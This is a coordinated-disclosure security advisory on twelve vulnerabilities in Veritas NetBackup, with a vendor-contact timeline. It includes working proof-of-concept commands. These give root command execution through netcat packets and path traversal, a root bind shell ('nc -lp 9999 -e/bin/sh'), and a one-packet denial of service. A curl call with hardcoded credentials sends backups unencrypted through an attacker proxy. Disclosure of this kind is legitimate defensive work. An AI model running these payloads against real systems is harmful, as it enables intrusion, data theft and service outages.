Veritas NetBackup DoS / Command Execution / Privilege Escalation / Traversal

Veritas NetBackup versions 6.5.6 and 7.6.10 suffer from remote command execution, denial of service, path traversal, and privilege escalation vulnerabilities.


MD5 | 37a97b8dac4781674a2adc592b1913de

Veritas NetBackup and NetBackup appliance - Multiple Vulnerabilities
--------------------------------------------------------------------

Introduction
============
Multiple critical vulnerabilities were identified in Veritas NetBackup
and NetBackup appliance. The vulnerabilities were discovered during a
black box security assessment and therefore the vulnerability list
should not be considered exhaustive.

Affected Software and Versions
==============================
- Tested with Veritas NetBackup 6.5.6, 7.6.1.0
- No newer versions were tested
- Veritas confirmed the affected versions to be:
- NetBackup 7.7.2 and below
- NetBackup Appliance 2.7.2 and below
- NB-03, NB-07, NB-08 and NB-12 are also affecting the newest
NetBackup 8.0 and NetBackup Appliance 3.0 release

Note: According to Veritas, issues NB-03, NB-07, NB-08 and NB-12 have
no fix available as of release of this report. The target date for
patches that fix these issues is 29th September, 2017. See the following
Advisory for more information:
https://www.veritas.com/content/support/en_US/security/VTS17-003.html

CVE
===
No CVEs have been assigned yet.

Author
======
The vulnerabilities were discovered by Sven Blumenstein, Xiaoran Wang
and Andrew Griffiths from Google Security Team.

Vulnerability Overview
======================

1. NB-01: CRITICAL: Privileged remote code execution via pbx_exchange
2. NB-02: CRITICAL: Local privilege escalation via bpcd
3. NB-03: MODERATE: Denial of Service affecting bpdbm
4. NB-04: CRITICAL: Privileged remote code execution via bprd
5. NB-05: CRITICAL: Path traversal in several applications
6. NB-06: HIGH: Arbitrary command execution via bpnbat
7. NB-07: CRITICAL: Hostname based security model
8. NB-08: HIGH: Local privilege escalation in pbx_exchange
9. NB-09: LOW: World writable log files
10. NB-10: HIGH: Netbackup processes run as privileged user
11. NB-11: CRITICAL: Auth bypass for Netbackup Cloud Storage Service
12. NB-12: CRITICAL: Unauthenticated CORBA interface exposing service APIs

Vulnerability Details
=====================

--------------------------------------------------------
NB-01: Privileged remote code execution via pbx_exchange
--------------------------------------------------------
Severity: CRITICAL

The pbx_exchange process allows remote privileged remote code execution by
sending a special packet leveraging the C_REMOTE_EXECUTE (0x46) call.

The following command executes a/usr/bin/ida on the Netbackup server
10.0.0.1:

$ echo -ne "ack=1\nextension=bprd\n\n329199 70 localhost root 1337
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id\n" | nc 10.0.0.1
1556

Strace output:
[pid 18240] execve("/bin/sh", ["sh", "-c",
"/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 21 vars
*/]) = 0
[pid 18240]
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id",
["/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 21 vars
*/]) = 0
[pid 18240] write(1, "uid=0(root) gid=0(root) groups=0(root)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n", 101) = 101

By replacing the parameter alocalhosta the server can be instructed to
execute the command on a Netbackup client. The following command executes
a/usr/bin/ida on the Netbackup client 10.0.0.111:

$ echo -ne "ack=1\nextension=bprd\n\n329199 70 10.0.0.111 root 1337
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id\n" | nc 10.0.0.1
1556

Strace output:
[pid 27150] execve("/bin/sh", ["sh", "-c",
"/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 16 vars
*/]) = 0
strace: Process 27151 attached
[pid 27151]
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id",
["/usr/openv/netbackup/bin/../../../../../../../usr/bin/id"], [/* 16 vars
*/]) = 0
[pid 27151] write(1, "uid=0(root) gid=0(root) groups=0(root)\n", 39) = 39

------------------------------------------
NB-02: Local privilege escalation via bpcd
------------------------------------------
Severity: CRITICAL

By sending a crafted packet to the bpcd daemon, it is possible to execute
privileged commands.

The following command starts a privileged netcat shell on port 9999:
$ echo -ne
"-437860936\x00\x00\x00\x31\x00\x00\x00O/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc
foo -lp 9999 -e/bin/sh" | nc 127.0.0.1 13782
^Z
[3]+ Stopped [...]
$ nc 127.0.0.1 9999
id
uid=0(root) gid=0(root) groups=0(root)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

----------------------------------------
NB-03: Denial of Service affecting bpdbm
----------------------------------------
Severity: MODERATE

By sending a crafted packet to the bpdbm process, it is possible to shutdown
the process and disrupt the functionality of the Netbackup server
application.

The following command terminates the bpdbm process on the Netbackup server
10.0.0.1:

$ echo -ne "1041669 99\n" | nc 10.0.0.1 13721

Log file excerpt of the bpdbm process:
19:22:18.384 [25272] <4> dbm_terminate: termination begun...error code = 0
19:22:18.389 [25272] <4> db_error_add_to_file: bpdbm TERMINATED
19:22:18.389 [25272] <4> dbm_terminate: bpdbm TERMINATED

------------------------------------------------
NB-04: Privileged remote code execution via bprd
------------------------------------------------
Severity: CRITICAL

The bprd process allows remote privileged remote code execution by sending
a special packet leveraging the C_REMOTE_EXECUTE (0x46) call.

The following command executes a/usr/bin/ida on the Netbackup server
10.0.0.1:

$ echo -ne "329199 94 localhost root 1337
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id foo\n" | nc
10.0.0.1 13720

Strace output:
[pid 21161]
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id", ["foo"],
[/* 21 vars */]) = 0
[pid 21161] write(1, "uid=0(root) gid=0(root) groups=0(root)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\n", 101) = 101

By replacing the parameter alocalhosta the server can be instructed to
execute the command on a Netbackup client. The following command executes
a/usr/bin/ida on the Netbackup client 10.0.0.111:

$ echo -ne "329199 94 10.0.0.111 root 1337
/usr/openv/netbackup/bin/../../../../../../../usr/bin/id foo\n" | nc
10.0.0.1 13720

Strace output:
[pid 27435]
execve("/usr/openv/netbackup/bin/../../../../../../../usr/bin/id", ["foo"],
[/* 16 vars */] <unfinished ...>
[pid 27435] write(1, "uid=0(root) gid=0(root) groups=0(root)\n", 39) = 39

---------------------------------------------
NB-05: Path traversal allows whitelist escape
---------------------------------------------
Severity: CRITICAL

Multiple Netbackup services that execute external commands check if the
requested command exists in a whitelist of folders. The whitelist consists
of the following list of directories:

/usr/openv/volmgr/bin
/usr/openv/bin
/usr/openv/netbackup/bin/admincmd
/usr/openv/netbackup/bin/private
/usr/openv/netbackup/bin/support
/usr/openv/netbackup/bin

It was discovered that all tested processes are vulnerable to path
traversal,
as also shown in the previously written examples. An attacker can use the
usual a../a pattern to bypass the whitelist check and execute arbitrary
commands.

The following string bypasses the validation and executes a/usr/bin/nca:

/usr/openv/netbackup/bin/../../../../../../../usr/bin/nc foo -lp 9999
-e/bin/sh

Note: A total of over 500 executables was discovered in the whitelisted
directories. It is possible that some executables contain vulnerabilities
that
could be leveraged for arbitrary command execution without the need of path
traversal. One example (bpnbat) is listed in this report.

---------------------------------------------
NB-06: Arbitrary command execution via bpnbat
---------------------------------------------
Severity: HIGH

The executable bpnbat allows execution of any passed command. This can be
combined
with other vulnerabilities to allow arbitrary command execution.

The following command executes a/usr/bin/ida:

$ /usr/openv/netbackup/bin/bpnbat -Execute -cf /root /usr/bin/id

Note: This is just an example and does not imply that this executable is
the only
one vulnerable to command injection.

As a lot of Netbackup processes rely on the execution of commands in
whitelisted
directories, having the option to do arbitrary command execution could
allow an
attacker to execute any command, even if whitelisting checks are properly
implemented.

------------------------------------
NB-07: Hostname based security model
------------------------------------
Severity: CRITICAL

It was discovered that several services on the Netbackup service rely
purely on
hostname validation for authenticity. E.g. a client connecting to the vnetd
daemon
on a Netbackup server has to be known to the server by hostname.

As the validating process goes through the operating systems DNS system to
get the
hostname for the connecting IP, this approach could be vulnerable to DNS
spoofing.

--------------------------------------------------------------------
NB-08: Local privilege escalation via race condition in pbx_exchange
--------------------------------------------------------------------
Severity: HIGH

It was discovered that during the startup of pbx_exchange, it
creates,binds, and
listens to sockets under a/tmpa for different components, such as
a/tmp/PBXPIPEbprda,
a/tmp/PBXPIPEnbarsa, etc.
The sockets are created with 777 mode and later changed to 600 with
achmod(socket_path, 600)a
after alisten(socket)a is called. Components connect to these sockets to
create a data transfer
socket, which is then used by pbx_exchange to forward client sockets to
those components.
The initial listening sockets under /tmp are unlinked afterwards.

Since the socket is created in a shared directory and with 777 permissions,
an unprivileged
process can connect to the sockets in a/tmp/PBXPIPE*a and impersonate the
legitimate components.

----------------------------------
9. NB-09: World writable log files
----------------------------------
Severity: LOW

It was discovered that many log files under a/usr/openv/netbackup/logsa are
world
writable, if logging is enabled.

Example:
# ls -l /usr/openv/netbackup/logs/bpjobd/
total 26200
-rw-rw-rw-. 1 root root 1512752 Nov 10 23:59 log.111016
-rw-rw-rw-. 1 root root 4783063 Nov 11 23:59 log.111116
-rw-rw-rw-. 1 root root 1814107 Nov 12 09:39 log.111216

World writable logs cannot ensure the integrity of the log files, enabling
an
attacker to tamper with the logs.

-----------------------------------------------------
10. NB-10: Netbackup processes run as privileged user
-----------------------------------------------------
Severity: HIGH

All Netbackup processes run as privileged user aroota. This significantly
eases an
attackerto gain control over the targeted system through vulnerabilities
discovered
in Netbackup services. It also makes potential hardening of the Netbackup
processes difficult.

----------------------------------------------------------
11. NB-11: Auth bypass for Netbackup Cloud Storage Service
----------------------------------------------------------
Severity: CRITICAL

Netbackup Client and Server installations run a service called anbcssca by
default. This service
listens on any interface, tcp/5637 and provides a HTTPS based webserver on
this port.

This webserver is providing a REST API that is used to control/configure
the Netbackup
Cloud Storage Service. The authentication for this webserver is done
through the
hardcoded username and password acsscuser:csscpwd`. Using these credentials
it is possible
to query and modify the Cloud Storage configuration.

The following command disables SSL transport encryption for Cloud backups
and configures
an arbitrary proxy server a10.13.37.0a to the Cloud Storage Service for
Amazon running
on the Netbackup system 10.0.0.1. This would send all future backups
unencrypted through
the attacker controlled proxy server:

$ curl -d "name=AMZ:USE_SSL,description=Use SSL encryption for
control,type=string,value=NO,fixed=n;name=AMZ:PROXY_IP,description=Specify
CURL proxy IP,type=string,value=10.13.37.0,fixed=n;" -X POST -u
csscuser:csscpwd -k https://10.0.0.1:5637/config/CS_Amazon/amazon

Reply:
name=CS_RESPONSE,description=Success,type=int,value=0,fixed=n;

The log file of `nbcssc` confirms the successful change of the
configuration:
16/11/17 16:00:03 OST : libsts setupp() 16/11/17 16:00:03:
CS_Amazon:amazon claimed by /usr/openv/lib/ost-plugins/libstspiamazonMT.so
[...]
16/11/17 16:00:03 OST : amazon: AMZ:USE_SSL=NO
16/11/17 16:00:03 OST : amazon: AMZ:PROXY_IP=10.13.37.0
16/11/17 16:00:03 OST : amazon: Closing user pref file
(/usr/openv/lib/ost-plugins/libstspiamazon.pref)

Verification of the changed configuration file locally:

# cat /usr/openv/lib/ost-plugins/libstspiamazon.pref
AMZ:USE_SSL=NO
AMZ:USE_SSL_RW=YES
AMZ:WRITE_BUFFER_SIZE=10485760
AMZ:WRITE_BUFFER_NUM=1
AMZ:LOG_CURL=NO
AMZ:READ_BUFFER_SIZE=0
AMZ:PROXY_TYPE=NONE
AMZ:PROXY_IP=10.13.37.0
AMZ:PROXY_PORT=70000
AMZ:CURL_CONNECT_TIMEOUT=300
AMZ:CURL_TIMEOUT=900


----------------------------------------------------------------
12. NB-12: Unauthenticated CORBA interface exposing service APIs
----------------------------------------------------------------
Severity: CRITICAL

Several components of the Netbackup installation communicate through CORBA
& TAO
(http://www.cs.wustl.edu/~schmidt/TAO.html). It was discovered that the
CORBA endpoints
of several services can be reached through the pbx_exchange service via
tcp/1556. There
is no authentication involved and pbx_exchange listens on any IP.

The following example sends a `ping` command to the service `nbjm` on the
Netbackup
server 10.0.0.1 and shows the successful GIOP reply packet:

# echo -ne
'extension=nbjm\x0a\x0aGIOP\x01\x02\x01\x00d\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00\x00\x00\x01\x00%\x00\x00\x00\x14\x01\x0f\x00NUP\x00\x00\x00\x0e\x00\x00\x00\x00\x01\x00\x00\x00\x00nbjm\x00\x01\x00\x00\x00\x01\x00\x00\x00nbjmbjm\x05\x00\x00\x00ping\x00nbj\x01\x00\x00\x00\x01\x00\x00\x00\x0c\x00\x00\x00\x017i\x9b\x01\x00\x01\x05\t\x01\x01\x00\x00\x00\x00\x00\xff\xff\xff\xff'
| nc 10.0.0.1 1556 | xxd
0000000: 0147 494f 5001 0201 0110 0000 0005 0000 .GIOP...........
0000010: 0000 0000 0000 0000 0000 0000 00 .............


Brief checking on some of the CORBA endpoint showed that there are API
functions for
accessing configuration settings (e.g. `updateDiskVolumeList`) or executing
commands
(e.g. `runBPCRClientCmd`).

Mitigation
==========
Please see the advisory for these issues provided by Veritas for guidance
around mitigation:

https://www.veritas.com/content/support/en_US/security/VTS17-003.html

Timeline
========
2016/11/29 - Security report sent to [email protected] with 90 day
disclosure deadline
2016/12/02 - Veritas confirmed recipe of report
2016/12/13 to 2017/02/03 - Several emails between Google Security and
Veritas regarding verification / details on issues
2017/02/03 - Veritas asks for deadline extension until 2017/10/01, as of 4
unpatched issues
2017/02/03 - Google Security points to Googles 90-day public disclosure
policy and rejects
deadline extension.
2017/02/27 - Google Security asks Veritas for information around mitigation
that can be added to this advisory.
2017/02/27 - Veritas shares link to public advisory that includes
mitigation advises for
customers (
https://www.veritas.com/content/support/en_US/security/VTS17-003.html)
2017/02/28 - Public disclosure



Related Posts